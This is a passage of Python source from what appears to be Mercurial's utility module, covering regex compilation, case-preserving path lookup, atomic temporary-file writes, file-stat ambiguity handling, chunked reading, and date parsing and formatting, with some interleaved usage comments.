1771 1771 For best performance, use only re2-compatible regexp features. The
1772 1772 only flags from the re module that are re2-compatible are
1773 1773 IGNORECASE and MULTILINE.'''
1774 1774 if _re2 is None:
1775 1775 self._checkre2()
1776 1776 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1777 1777 if flags & remod.IGNORECASE:
1778 1778 pat = '(?i)' + pat
1779 1779 if flags & remod.MULTILINE:
1780 1780 pat = '(?m)' + pat
1781 1781 try:
1782 1782 return re2.compile(pat)
1783 1783 except re2.error:
1784 1784 pass
1785 1785 return remod.compile(pat, flags)
1786 1786
1787 1787 @propertycache
1788 1788 def escape(self):
1789 1789 '''Return the version of escape corresponding to self.compile.
1790 1790
1791 1791 This is imperfect because whether re2 or re is used for a particular
1792 1792 function depends on the flags, etc, but it's the best we can do.
1793 1793 '''
1794 1794 global _re2
1795 1795 if _re2 is None:
1796 1796 self._checkre2()
1797 1797 if _re2:
1798 1798 return re2.escape
1799 1799 else:
1800 1800 return remod.escape
1801 1801
1802 1802 re = _re()
1803 1803
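# The module-level 're' above is a drop-in for the stdlib module within the
# re2-compatible subset (IGNORECASE/MULTILINE only). A sketch with an
# illustrative pattern and input:
#
#     pat = re.compile(br'^[a-f0-9]{40}$', remod.IGNORECASE)
#     pat.match(b'A' * 40)   # matches, case-insensitively
#     re.escape(b'a+b')      # escape function matching the engine in use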
1804 1804 _fspathcache = {}
1805 1805 def fspath(name, root):
1806 1806 '''Get name in the case stored in the filesystem
1807 1807
1808 1808 The name should be relative to root, and be normcase-ed for efficiency.
1809 1809
1810 1810 Note that this function is unnecessary, and should not be
1811 1811 called, for case-sensitive filesystems (simply because it's expensive).
1812 1812
1813 1813 The root should be normcase-ed, too.
1814 1814 '''
1815 1815 def _makefspathcacheentry(dir):
1816 1816 return dict((normcase(n), n) for n in os.listdir(dir))
1817 1817
1818 1818 seps = pycompat.ossep
1819 1819 if pycompat.osaltsep:
1820 1820 seps = seps + pycompat.osaltsep
1821 1821 # Protect backslashes. This gets silly very quickly.
1822 1822 seps = seps.replace('\\', '\\\\') # str.replace returns a new string
1823 1823 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1824 1824 dir = os.path.normpath(root)
1825 1825 result = []
1826 1826 for part, sep in pattern.findall(name):
1827 1827 if sep:
1828 1828 result.append(sep)
1829 1829 continue
1830 1830
1831 1831 if dir not in _fspathcache:
1832 1832 _fspathcache[dir] = _makefspathcacheentry(dir)
1833 1833 contents = _fspathcache[dir]
1834 1834
1835 1835 found = contents.get(part)
1836 1836 if not found:
1837 1837 # retry "once per directory" per "dirstate.walk", which
1838 1838 # may take place for each patch of "hg qpush", for example
1839 1839 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1840 1840 found = contents.get(part)
1841 1841
1842 1842 result.append(found or part)
1843 1843 dir = os.path.join(dir, part)
1844 1844
1845 1845 return ''.join(result)
1846 1846
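# A fspath() sketch, useful only on case-insensitive filesystems; both
# arguments must already be normcase-ed (names are illustrative):
#
#     root = normcase(b'/repo')
#     fspath(normcase(b'Foo/Bar.TXT'), root)
#     # -> the path spelled exactly as the filesystem stores it,
#     #    e.g. b'Foo/bar.TXT'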
1847 1847 def checknlink(testfile):
1848 1848 '''check whether hardlink count reporting works properly'''
1849 1849
1850 1850 # testfile may be open, so we need a separate file for checking to
1851 1851 # work around issue2543 (or testfile may get lost on Samba shares)
1852 1852 f1, f2, fp = None, None, None
1853 1853 try:
1854 1854 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1855 1855 suffix='1~', dir=os.path.dirname(testfile))
1856 1856 os.close(fd)
1857 1857 f2 = '%s2~' % f1[:-2]
1858 1858
1859 1859 oslink(f1, f2)
1860 1860 # nlinks() may behave differently for files on Windows shares if
1861 1861 # the file is open.
1862 1862 fp = posixfile(f2)
1863 1863 return nlinks(f2) > 1
1864 1864 except OSError:
1865 1865 return False
1866 1866 finally:
1867 1867 if fp is not None:
1868 1868 fp.close()
1869 1869 for f in (f1, f2):
1870 1870 try:
1871 1871 if f is not None:
1872 1872 os.unlink(f)
1873 1873 except OSError:
1874 1874 pass
1875 1875
1876 1876 def endswithsep(path):
1877 1877 '''Check path ends with os.sep or os.altsep.'''
1878 1878 return (path.endswith(pycompat.ossep)
1879 1879 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1880 1880
1881 1881 def splitpath(path):
1882 1882 '''Split path by os.sep.
1883 1883 Note that this function does not use os.altsep because this is
1884 1884 an alternative to a simple "xxx.split(os.sep)".
1885 1885 It is recommended to use os.path.normpath() before using this
1886 1886 function if needed.'''
1887 1887 return path.split(pycompat.ossep)
1888 1888
1889 1889 def gui():
1890 1890 '''Are we running in a GUI?'''
1891 1891 if pycompat.isdarwin:
1892 1892 if 'SSH_CONNECTION' in encoding.environ:
1893 1893 # handle SSH access to a box where the user is logged in
1894 1894 return False
1895 1895 elif getattr(osutil, 'isgui', None):
1896 1896 # check if a CoreGraphics session is available
1897 1897 return osutil.isgui()
1898 1898 else:
1899 1899 # pure build; use a safe default
1900 1900 return True
1901 1901 else:
1902 1902 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1903 1903
1904 1904 def mktempcopy(name, emptyok=False, createmode=None):
1905 1905 """Create a temporary file with the same contents from name
1906 1906
1907 1907 The permission bits are copied from the original file.
1908 1908
1909 1909 If the temporary file is going to be truncated immediately, you
1910 1910 can use emptyok=True as an optimization.
1911 1911
1912 1912 Returns the name of the temporary file.
1913 1913 """
1914 1914 d, fn = os.path.split(name)
1915 1915 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1916 1916 os.close(fd)
1917 1917 # Temporary files are created with mode 0600, which is usually not
1918 1918 # what we want. If the original file already exists, just copy
1919 1919 # its mode. Otherwise, manually obey umask.
1920 1920 copymode(name, temp, createmode)
1921 1921 if emptyok:
1922 1922 return temp
1923 1923 try:
1924 1924 try:
1925 1925 ifp = posixfile(name, "rb")
1926 1926 except IOError as inst:
1927 1927 if inst.errno == errno.ENOENT:
1928 1928 return temp
1929 1929 if not getattr(inst, 'filename', None):
1930 1930 inst.filename = name
1931 1931 raise
1932 1932 ofp = posixfile(temp, "wb")
1933 1933 for chunk in filechunkiter(ifp):
1934 1934 ofp.write(chunk)
1935 1935 ifp.close()
1936 1936 ofp.close()
1937 1937 except: # re-raises
1938 1938 try:
1939 1939 os.unlink(temp)
1940 1940 except OSError:
1941 1941 pass
1942 1942 raise
1943 1943 return temp
1944 1944
1945 1945 class filestat(object):
1946 1946 """help to exactly detect change of a file
1947 1947
1948 1948 The 'stat' attribute is the result of 'os.stat()' if the specified
1949 1949 'path' exists. Otherwise, it is None. This saves callers of this
1950 1950 class a preparatory 'exists()' check.
1951 1951 """
1952 1952 def __init__(self, stat):
1953 1953 self.stat = stat
1954 1954
1955 1955 @classmethod
1956 1956 def frompath(cls, path):
1957 1957 try:
1958 1958 stat = os.stat(path)
1959 1959 except OSError as err:
1960 1960 if err.errno != errno.ENOENT:
1961 1961 raise
1962 1962 stat = None
1963 1963 return cls(stat)
1964 1964
1965 1965 @classmethod
1966 1966 def fromfp(cls, fp):
1967 1967 stat = os.fstat(fp.fileno())
1968 1968 return cls(stat)
1969 1969
1970 1970 __hash__ = object.__hash__
1971 1971
1972 1972 def __eq__(self, old):
1973 1973 try:
1974 1974 # if ambiguity between stat of new and old file is
1975 1975 # avoided, comparison of size, ctime and mtime is enough
1976 1976 # to exactly detect change of a file regardless of platform
1977 1977 return (self.stat.st_size == old.stat.st_size and
1978 1978 self.stat.st_ctime == old.stat.st_ctime and
1979 1979 self.stat.st_mtime == old.stat.st_mtime)
1980 1980 except AttributeError:
1981 1981 pass
1982 1982 try:
1983 1983 return self.stat is None and old.stat is None
1984 1984 except AttributeError:
1985 1985 return False
1986 1986
1987 1987 def isambig(self, old):
1988 1988 """Examine whether new (= self) stat is ambiguous against old one
1989 1989
1990 1990 "S[N]" below means stat of a file at N-th change:
1991 1991
1992 1992 - S[n-1].ctime < S[n].ctime: can detect change of a file
1993 1993 - S[n-1].ctime == S[n].ctime
1994 1994 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1995 1995 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1996 1996 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1997 1997 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1998 1998
1999 1999 Case (*2) above means that a file was changed twice or more
2000 2000 within the same second (= S[n-1].ctime), so comparison of
2001 2001 timestamps is ambiguous.
2002 2002
2003 2003 The basic idea for avoiding such ambiguity is to "advance mtime
2004 2004 by 1 sec, if the timestamp is ambiguous".
2005 2005
2006 2006 But advancing mtime only in case (*2) doesn't work as
2007 2007 expected, because a naturally advanced S[n].mtime in case (*1)
2008 2008 might be equal to a manually advanced S[n-1 or earlier].mtime.
2009 2009
2010 2010 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2011 2011 treated as ambiguous regardless of mtime, to avoid overlooking
2012 2012 a change masked by colliding mtimes.
2013 2013
2014 2014 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2015 2015 S[n].mtime", even if size of a file isn't changed.
2016 2016 """
2017 2017 try:
2018 2018 return (self.stat.st_ctime == old.stat.st_ctime)
2019 2019 except AttributeError:
2020 2020 return False
2021 2021
2022 2022 def avoidambig(self, path, old):
2023 2023 """Change file stat of specified path to avoid ambiguity
2024 2024
2025 2025 'old' should be previous filestat of 'path'.
2026 2026
2027 2027 Avoiding ambiguity is skipped if the process doesn't have
2028 2028 appropriate privileges for 'path'; in that case this returns
2029 2029 False.
2030 2030
2031 2031 Otherwise, this returns True, as "ambiguity is avoided".
2032 2032 """
2033 2033 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2034 2034 try:
2035 2035 os.utime(path, (advanced, advanced))
2036 2036 except OSError as inst:
2037 2037 if inst.errno == errno.EPERM:
2038 2038 # utime() on the file created by another user causes EPERM,
2039 2039 # if a process doesn't have appropriate privileges
2040 2040 return False
2041 2041 raise
2042 2042 return True
2043 2043
2044 2044 def __ne__(self, other):
2045 2045 return not self == other
2046 2046
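# A sketch of how callers combine the pieces above; 'path' names a file
# guarded by a lock and rewriteinplace() is a hypothetical mutator:
#
#     oldstat = filestat.frompath(path)
#     rewriteinplace(path)
#     newstat = filestat.frompath(path)
#     if newstat.isambig(oldstat):
#         # size/ctime/mtime can no longer distinguish old from new, so
#         # push mtime forward to make the change observable
#         newstat.avoidambig(path, oldstat)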
2047 2047 class atomictempfile(object):
2048 2048 '''writable file object that atomically updates a file
2049 2049
2050 2050 All writes will go to a temporary copy of the original file. Call
2051 2051 close() when you are done writing, and atomictempfile will rename
2052 2052 the temporary copy to the original name, making the changes
2053 2053 visible. If the object is destroyed without being closed, all your
2054 2054 writes are discarded.
2055 2055
2056 2056 checkambig argument of constructor is used with filestat, and is
2057 2057 useful only if target file is guarded by any lock (e.g. repo.lock
2058 2058 or repo.wlock).
2059 2059 '''
2060 2060 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2061 2061 self.__name = name # permanent name
2062 2062 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2063 2063 createmode=createmode)
2064 2064 self._fp = posixfile(self._tempname, mode)
2065 2065 self._checkambig = checkambig
2066 2066
2067 2067 # delegated methods
2068 2068 self.read = self._fp.read
2069 2069 self.write = self._fp.write
2070 2070 self.seek = self._fp.seek
2071 2071 self.tell = self._fp.tell
2072 2072 self.fileno = self._fp.fileno
2073 2073
2074 2074 def close(self):
2075 2075 if not self._fp.closed:
2076 2076 self._fp.close()
2077 2077 filename = localpath(self.__name)
2078 2078 oldstat = self._checkambig and filestat.frompath(filename)
2079 2079 if oldstat and oldstat.stat:
2080 2080 rename(self._tempname, filename)
2081 2081 newstat = filestat.frompath(filename)
2082 2082 if newstat.isambig(oldstat):
2083 2083 # stat of changed file is ambiguous to original one
2084 2084 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2085 2085 os.utime(filename, (advanced, advanced))
2086 2086 else:
2087 2087 rename(self._tempname, filename)
2088 2088
2089 2089 def discard(self):
2090 2090 if not self._fp.closed:
2091 2091 try:
2092 2092 os.unlink(self._tempname)
2093 2093 except OSError:
2094 2094 pass
2095 2095 self._fp.close()
2096 2096
2097 2097 def __del__(self):
2098 2098 if safehasattr(self, '_fp'): # constructor actually did something
2099 2099 self.discard()
2100 2100
2101 2101 def __enter__(self):
2102 2102 return self
2103 2103
2104 2104 def __exit__(self, exctype, excvalue, traceback):
2105 2105 if exctype is not None:
2106 2106 self.discard()
2107 2107 else:
2108 2108 self.close()
2109 2109
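# Typical atomictempfile usage as a context manager (file name and payload
# are illustrative):
#
#     with atomictempfile(b'requires', mode='wb') as fp:
#         fp.write(b'dotencode\nfncache\n')
#     # on normal exit the temp copy is renamed over b'requires'; on an
#     # exception it is discarded and the original file stays untouched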
2110 2110 def unlinkpath(f, ignoremissing=False):
2111 2111 """unlink and remove the directory if it is empty"""
2112 2112 if ignoremissing:
2113 2113 tryunlink(f)
2114 2114 else:
2115 2115 unlink(f)
2116 2116 # try removing directories that might now be empty
2117 2117 try:
2118 2118 removedirs(os.path.dirname(f))
2119 2119 except OSError:
2120 2120 pass
2121 2121
2122 2122 def tryunlink(f):
2123 2123 """Attempt to remove a file, ignoring ENOENT errors."""
2124 2124 try:
2125 2125 unlink(f)
2126 2126 except OSError as e:
2127 2127 if e.errno != errno.ENOENT:
2128 2128 raise
2129 2129
2130 2130 def makedirs(name, mode=None, notindexed=False):
2131 2131 """recursive directory creation with parent mode inheritance
2132 2132
2133 2133 Newly created directories are marked as "not to be indexed by
2134 2134 the content indexing service", if ``notindexed`` is specified
2135 2135 for "write" mode access.
2136 2136 """
2137 2137 try:
2138 2138 makedir(name, notindexed)
2139 2139 except OSError as err:
2140 2140 if err.errno == errno.EEXIST:
2141 2141 return
2142 2142 if err.errno != errno.ENOENT or not name:
2143 2143 raise
2144 2144 parent = os.path.dirname(os.path.abspath(name))
2145 2145 if parent == name:
2146 2146 raise
2147 2147 makedirs(parent, mode, notindexed)
2148 2148 try:
2149 2149 makedir(name, notindexed)
2150 2150 except OSError as err:
2151 2151 # Catch EEXIST to handle races
2152 2152 if err.errno == errno.EEXIST:
2153 2153 return
2154 2154 raise
2155 2155 if mode is not None:
2156 2156 os.chmod(name, mode)
2157 2157
2158 2158 def readfile(path):
2159 2159 with open(path, 'rb') as fp:
2160 2160 return fp.read()
2161 2161
2162 2162 def writefile(path, text):
2163 2163 with open(path, 'wb') as fp:
2164 2164 fp.write(text)
2165 2165
2166 2166 def appendfile(path, text):
2167 2167 with open(path, 'ab') as fp:
2168 2168 fp.write(text)
2169 2169
2170 2170 class chunkbuffer(object):
2171 2171 """Allow arbitrary sized chunks of data to be efficiently read from an
2172 2172 iterator over chunks of arbitrary size."""
2173 2173
2174 2174 def __init__(self, in_iter):
2175 2175 """in_iter is the iterator that's iterating over the input chunks."""
2176 2176 def splitbig(chunks):
2177 2177 for chunk in chunks:
2178 2178 if len(chunk) > 2**20:
2179 2179 pos = 0
2180 2180 while pos < len(chunk):
2181 2181 end = pos + 2 ** 18
2182 2182 yield chunk[pos:end]
2183 2183 pos = end
2184 2184 else:
2185 2185 yield chunk
2186 2186 self.iter = splitbig(in_iter)
2187 2187 self._queue = collections.deque()
2188 2188 self._chunkoffset = 0
2189 2189
2190 2190 def read(self, l=None):
2191 2191 """Read L bytes of data from the iterator of chunks of data.
2192 2192 Returns less than L bytes if the iterator runs dry.
2193 2193
2194 2194 If the size parameter is omitted, read everything."""
2195 2195 if l is None:
2196 2196 return ''.join(self.iter)
2197 2197
2198 2198 left = l
2199 2199 buf = []
2200 2200 queue = self._queue
2201 2201 while left > 0:
2202 2202 # refill the queue
2203 2203 if not queue:
2204 2204 target = 2**18
2205 2205 for chunk in self.iter:
2206 2206 queue.append(chunk)
2207 2207 target -= len(chunk)
2208 2208 if target <= 0:
2209 2209 break
2210 2210 if not queue:
2211 2211 break
2212 2212
2213 2213 # The easy way to do this would be to queue.popleft(), modify the
2214 2214 # chunk (if necessary), then queue.appendleft(). However, for cases
2215 2215 # where we read partial chunk content, this incurs 2 dequeue
2216 2216 # mutations and creates a new str for the remaining chunk in the
2217 2217 # queue. Our code below avoids this overhead.
2218 2218
2219 2219 chunk = queue[0]
2220 2220 chunkl = len(chunk)
2221 2221 offset = self._chunkoffset
2222 2222
2223 2223 # Use full chunk.
2224 2224 if offset == 0 and left >= chunkl:
2225 2225 left -= chunkl
2226 2226 queue.popleft()
2227 2227 buf.append(chunk)
2228 2228 # self._chunkoffset remains at 0.
2229 2229 continue
2230 2230
2231 2231 chunkremaining = chunkl - offset
2232 2232
2233 2233 # Use all of unconsumed part of chunk.
2234 2234 if left >= chunkremaining:
2235 2235 left -= chunkremaining
2236 2236 queue.popleft()
2237 2237 # the offset == 0 case is handled by the block above, so this
2238 2238 # won't merely copy via ``chunk[0:]``.
2239 2239 buf.append(chunk[offset:])
2240 2240 self._chunkoffset = 0
2241 2241
2242 2242 # Partial chunk needed.
2243 2243 else:
2244 2244 buf.append(chunk[offset:offset + left])
2245 2245 self._chunkoffset += left
2246 2246 left -= chunkremaining
2247 2247
2248 2248 return ''.join(buf)
2249 2249
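# A chunkbuffer sketch: reads of any size are served from an iterator of
# unevenly sized chunks (values are illustrative):
#
#     buf = chunkbuffer(iter([b'abc', b'defg', b'h']))
#     buf.read(2)   # -> b'ab'
#     buf.read(4)   # -> b'cdef' (spans two input chunks)
#     buf.read(3)   # -> b'gh' (iterator ran dry; short read)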
2250 2250 def filechunkiter(f, size=131072, limit=None):
2251 2251 """Create a generator that produces the data in the file size
2252 2252 (default 131072) bytes at a time, up to optional limit (default is
2253 2253 to read all data). Chunks may be less than size bytes if the
2254 2254 chunk is the last chunk in the file, or the file is a socket or
2255 2255 some other type of file that sometimes reads less data than is
2256 2256 requested."""
2257 2257 assert size >= 0
2258 2258 assert limit is None or limit >= 0
2259 2259 while True:
2260 2260 if limit is None:
2261 2261 nbytes = size
2262 2262 else:
2263 2263 nbytes = min(limit, size)
2264 2264 s = nbytes and f.read(nbytes)
2265 2265 if not s:
2266 2266 break
2267 2267 if limit:
2268 2268 limit -= len(s)
2269 2269 yield s
2270 2270
2271 2271 class cappedreader(object):
2272 2272 """A file object proxy that allows reading up to N bytes.
2273 2273
2274 2274 Given a source file object, instances of this type allow reading up to
2275 2275 N bytes from that source file object. Attempts to read past the allowed
2276 2276 limit are treated as EOF.
2277 2277
2278 2278 It is assumed that I/O is not performed on the original file object
2279 2279 in addition to I/O that is performed by this instance. If it is,
2280 2280 state tracking will get out of sync and unexpected results will ensue.
2281 2281 """
2282 2282 def __init__(self, fh, limit):
2283 2283 """Allow reading up to <limit> bytes from <fh>."""
2284 2284 self._fh = fh
2285 2285 self._left = limit
2286 2286
2287 2287 def read(self, n=-1):
2288 2288 if not self._left:
2289 2289 return b''
2290 2290
2291 2291 if n < 0:
2292 2292 n = self._left
2293 2293
2294 2294 data = self._fh.read(min(n, self._left))
2295 2295 self._left -= len(data)
2296 2296 assert self._left >= 0
2297 2297
2298 2298 return data
2299 2299
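# A cappedreader sketch; 'fh' stands for a file object positioned at the
# start of a 100-byte region the caller is allowed to consume:
#
#     reader = cappedreader(fh, 100)
#     reader.read(64)   # at most 64 bytes
#     reader.read()     # the remainder of the 100-byte window
#     reader.read(1)    # -> b'' (past the limit is treated as EOF)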
2300 2300 def makedate(timestamp=None):
2301 2301 '''Return a unix timestamp (or the current time) as a (unixtime,
2302 2302 offset) tuple based off the local timezone.'''
2303 2303 if timestamp is None:
2304 2304 timestamp = time.time()
2305 2305 if timestamp < 0:
2306 2306 hint = _("check your clock")
2307 2307 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2308 2308 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2309 2309 datetime.datetime.fromtimestamp(timestamp))
2310 2310 tz = delta.days * 86400 + delta.seconds
2311 2311 return timestamp, tz
2312 2312
2313 2313 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2314 2314 """represent a (unixtime, offset) tuple as a localized time.
2315 2315 unixtime is seconds since the epoch, and offset is the time zone's
2316 2316 number of seconds away from UTC.
2317 2317
2318 2318 >>> datestr((0, 0))
2319 2319 'Thu Jan 01 00:00:00 1970 +0000'
2320 2320 >>> datestr((42, 0))
2321 2321 'Thu Jan 01 00:00:42 1970 +0000'
2322 2322 >>> datestr((-42, 0))
2323 2323 'Wed Dec 31 23:59:18 1969 +0000'
2324 2324 >>> datestr((0x7fffffff, 0))
2325 2325 'Tue Jan 19 03:14:07 2038 +0000'
2326 2326 >>> datestr((-0x80000000, 0))
2327 2327 'Fri Dec 13 20:45:52 1901 +0000'
2328 2328 """
2329 2329 t, tz = date or makedate()
2330 2330 if "%1" in format or "%2" in format or "%z" in format:
2331 2331 sign = (tz > 0) and "-" or "+"
2332 2332 minutes = abs(tz) // 60
2333 2333 q, r = divmod(minutes, 60)
2334 2334 format = format.replace("%z", "%1%2")
2335 2335 format = format.replace("%1", "%c%02d" % (sign, q))
2336 2336 format = format.replace("%2", "%02d" % r)
2337 2337 d = t - tz
2338 2338 if d > 0x7fffffff:
2339 2339 d = 0x7fffffff
2340 2340 elif d < -0x80000000:
2341 2341 d = -0x80000000
2342 2342 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2343 2343 # because they use the gmtime() system call which is buggy on Windows
2344 2344 # for negative values.
2345 2345 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2346 2346 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2347 2347 return s
2348 2348
2349 2349 def shortdate(date=None):
2350 2350 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2351 2351 return datestr(date, format='%Y-%m-%d')
2352 2352
2353 2353 def parsetimezone(s):
2354 2354 """find a trailing timezone, if any, in string, and return a
2355 2355 (offset, remainder) pair"""
2356 2356 s = pycompat.bytestr(s)
2357 2357
2358 2358 if s.endswith("GMT") or s.endswith("UTC"):
2359 2359 return 0, s[:-3].rstrip()
2360 2360
2361 2361 # Unix-style timezones [+-]hhmm
2362 2362 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2363 2363 sign = (s[-5] == "+") and 1 or -1
2364 2364 hours = int(s[-4:-2])
2365 2365 minutes = int(s[-2:])
2366 2366 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2367 2367
2368 2368 # ISO8601 trailing Z
2369 2369 if s.endswith("Z") and s[-2:-1].isdigit():
2370 2370 return 0, s[:-1]
2371 2371
2372 2372 # ISO8601-style [+-]hh:mm
2373 2373 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2374 2374 s[-5:-3].isdigit() and s[-2:].isdigit()):
2375 2375 sign = (s[-6] == "+") and 1 or -1
2376 2376 hours = int(s[-5:-3])
2377 2377 minutes = int(s[-2:])
2378 2378 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2379 2379
2380 2380 return None, s
2381 2381
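# parsetimezone() returns this module's offset convention (seconds, with
# zones east of UTC negative), plus the unparsed remainder:
#
#     parsetimezone(b'2017-1-1 12:00 +0100')  # -> (-3600, b'2017-1-1 12:00')
#     parsetimezone(b'12:00 GMT')             # -> (0, b'12:00')
#     parsetimezone(b'no zone here')          # -> (None, b'no zone here')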
2382 2382 def strdate(string, format, defaults=None):
2383 2383 """parse a localized time string and return a (unixtime, offset) tuple.
2384 2384 if the string cannot be parsed, ValueError is raised."""
2385 2385 if defaults is None:
2386 2386 defaults = {}
2387 2387
2388 2388 # NOTE: unixtime = localunixtime + offset
2389 2389 offset, date = parsetimezone(string)
2390 2390
2391 2391 # add missing elements from defaults
2392 2392 usenow = False # default to using biased defaults
2393 2393 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2394 2394 part = pycompat.bytestr(part)
2395 2395 found = [True for p in part if ("%"+p) in format]
2396 2396 if not found:
2397 2397 date += "@" + defaults[part][usenow]
2398 2398 format += "@%" + part[0]
2399 2399 else:
2400 2400 # We've found a specific time element, less specific time
2401 2401 # elements are relative to today
2402 2402 usenow = True
2403 2403
2404 2404 timetuple = time.strptime(encoding.strfromlocal(date),
2405 2405 encoding.strfromlocal(format))
2406 2406 localunixtime = int(calendar.timegm(timetuple))
2407 2407 if offset is None:
2408 2408 # local timezone
2409 2409 unixtime = int(time.mktime(timetuple))
2410 2410 offset = unixtime - localunixtime
2411 2411 else:
2412 2412 unixtime = localunixtime + offset
2413 2413 return unixtime, offset
2414 2414
2415 2415 def parsedate(date, formats=None, bias=None):
2416 2416 """parse a localized date/time and return a (unixtime, offset) tuple.
2417 2417
2418 2418 The date may be a "unixtime offset" string or in one of the specified
2419 2419 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2420 2420
2421 2421 >>> parsedate(b' today ') == parsedate(
2422 2422 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2423 2423 True
2424 2424 >>> parsedate(b'yesterday ') == parsedate(
2425 2425 ... (datetime.date.today() - datetime.timedelta(days=1)
2426 2426 ... ).strftime('%b %d').encode('ascii'))
2427 2427 True
2428 2428 >>> now, tz = makedate()
2429 2429 >>> strnow, strtz = parsedate(b'now')
2430 2430 >>> (strnow - now) < 1
2431 2431 True
2432 2432 >>> tz == strtz
2433 2433 True
2434 2434 """
2435 2435 if bias is None:
2436 2436 bias = {}
2437 2437 if not date:
2438 2438 return 0, 0
2439 2439 if isinstance(date, tuple) and len(date) == 2:
2440 2440 return date
2441 2441 if not formats:
2442 2442 formats = defaultdateformats
2443 2443 date = date.strip()
2444 2444
2445 2445 if date == 'now' or date == _('now'):
2446 2446 return makedate()
2447 2447 if date == 'today' or date == _('today'):
2448 2448 date = datetime.date.today().strftime(r'%b %d')
2449 2449 date = encoding.strtolocal(date)
2450 2450 elif date == 'yesterday' or date == _('yesterday'):
2451 2451 date = (datetime.date.today() -
2452 2452 datetime.timedelta(days=1)).strftime(r'%b %d')
2453 2453 date = encoding.strtolocal(date)
2454 2454
2455 2455 try:
2456 2456 when, offset = map(int, date.split(' '))
2457 2457 except ValueError:
2458 2458 # fill out defaults
2459 2459 now = makedate()
2460 2460 defaults = {}
2461 2461 for part in ("d", "mb", "yY", "HI", "M", "S"):
2462 2462 # this piece is for rounding the specific end of unknowns
2463 2463 b = bias.get(part)
2464 2464 if b is None:
2465 2465 if part[0:1] in "HMS":
2466 2466 b = "00"
2467 2467 else:
2468 2468 b = "0"
2469 2469
2470 2470 # this piece is for matching the generic end to today's date
2471 2471 n = datestr(now, "%" + part[0:1])
2472 2472
2473 2473 defaults[part] = (b, n)
2474 2474
2475 2475 for format in formats:
2476 2476 try:
2477 2477 when, offset = strdate(date, format, defaults)
2478 2478 except (ValueError, OverflowError):
2479 2479 pass
2480 2480 else:
2481 2481 break
2482 2482 else:
2483 2483 raise error.ParseError(
2484 2484 _('invalid date: %r') % pycompat.bytestr(date))
2485 2485 # validate explicit (probably user-specified) date and
2486 2486 # time zone offset. values must fit in signed 32 bits for
2487 2487 # current 32-bit linux runtimes. timezones go from UTC-12
2488 2488 # to UTC+14
2489 2489 if when < -0x80000000 or when > 0x7fffffff:
2490 2490 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2491 2491 if offset < -50400 or offset > 43200:
2492 2492 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2493 2493 return when, offset
2494 2494
2495 2495 def matchdate(date):
2496 2496 """Return a function that matches a given date match specifier
2497 2497
2498 2498 Formats include:
2499 2499
2500 2500 '{date}' match a given date to the accuracy provided
2501 2501
2502 2502 '<{date}' on or before a given date
2503 2503
2504 2504 '>{date}' on or after a given date
2505 2505
2506 2506 >>> p1 = parsedate(b"10:29:59")
2507 2507 >>> p2 = parsedate(b"10:30:00")
2508 2508 >>> p3 = parsedate(b"10:30:59")
2509 2509 >>> p4 = parsedate(b"10:31:00")
2510 2510 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2511 2511 >>> f = matchdate(b"10:30")
2512 2512 >>> f(p1[0])
2513 2513 False
2514 2514 >>> f(p2[0])
2515 2515 True
2516 2516 >>> f(p3[0])
2517 2517 True
2518 2518 >>> f(p4[0])
2519 2519 False
2520 2520 >>> f(p5[0])
2521 2521 False
2522 2522 """
2523 2523
2524 2524 def lower(date):
2525 2525 d = {'mb': "1", 'd': "1"}
2526 2526 return parsedate(date, extendeddateformats, d)[0]
2527 2527
2528 2528 def upper(date):
2529 2529 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2530 2530 for days in ("31", "30", "29"):
2531 2531 try:
2532 2532 d["d"] = days
2533 2533 return parsedate(date, extendeddateformats, d)[0]
2534 2534 except error.ParseError:
2535 2535 pass
2536 2536 d["d"] = "28"
2537 2537 return parsedate(date, extendeddateformats, d)[0]
2538 2538
2539 2539 date = date.strip()
2540 2540
2541 2541 if not date:
2542 2542 raise Abort(_("dates cannot consist entirely of whitespace"))
2543 2543 elif date[0] == "<":
2544 2544 if not date[1:]:
2545 2545 raise Abort(_("invalid day spec, use '<DATE'"))
2546 2546 when = upper(date[1:])
2547 2547 return lambda x: x <= when
2548 2548 elif date[0] == ">":
2549 2549 if not date[1:]:
2550 2550 raise Abort(_("invalid day spec, use '>DATE'"))
2551 2551 when = lower(date[1:])
2552 2552 return lambda x: x >= when
2553 2553 elif date[0] == "-":
2554 2554 try:
2555 2555 days = int(date[1:])
2556 2556 except ValueError:
2557 2557 raise Abort(_("invalid day spec: %s") % date[1:])
2558 2558 if days < 0:
2559 2559 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2560 2560 % date[1:])
2561 2561 when = makedate()[0] - days * 3600 * 24
